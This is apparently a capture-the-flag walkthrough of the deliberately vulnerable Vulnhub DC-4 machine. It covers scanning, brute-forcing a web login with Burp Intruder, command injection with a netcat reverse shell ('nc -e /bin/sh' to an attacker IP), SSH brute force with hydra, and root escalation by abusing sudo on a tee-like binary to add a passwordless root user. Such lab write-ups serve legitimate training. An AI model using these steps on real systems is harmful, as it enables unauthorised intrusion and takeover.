Vulnhub - DC 4
We are going to pwn DC 4 by DCAU7 from Vulnhub
Description
DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. Unlike the previous DC releases, this one is designed primarily for beginners/intermediates. There is only one flag, but technically, multiple entry points and just like last time, no clues. Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools. For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.
Download Link: https://www.vulnhub.com/entry/dc-4,313/
Lets Begin with our Initial Scan
Nmap Scan Results
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Looks like only HTTP port is open so lets start our Gobuster
Gobuster Result
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.0.2.8
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2019/11/26 19:35:19 Starting gobuster
===============================================================
/css (Status: 301)
/images (Status: 301)
/index.php (Status: 200)
===============================================================
2019/11/26 19:35:20 Finished
===============================================================

It looks like login Page So i tried some normal sql injection but none worked so lets try bruteforce We can use Burp Intruder for that

Attack type : Cluster Bomb

Now in payload , load wordlist and start attack!

This one gives different length it might be the password br/

And yes I logged in.
After login I got a page Command.phpbr/
br/

Getting Shell
It looks like , it executes system commands.
So I intercept the command with burp and got a reverse shell.

nc -e /bin/sh 10.0.2.18 1234

We got a Shell!!

So while searching for anything usefull i found old-passwords.bak
Since i found it in jim directory, lets bruteforce with jim
Getting User Jim
Lets start bruteforcing the ssh port using hydra
hydra - a very fast network logon cracker which supports many different services

we found the password is jim:jibril04
Found some users too

Getting User Charles
While Checking jim directory there is mbox

Since it looks like mail we check /var/mail

It gives password for charles I su to charles
Privilege Escalation
sudo -l shows we can run teehee with root permission

It looks like we can overwrite any file so i created new user with root permission without password!
Got ROOT !!
Flag

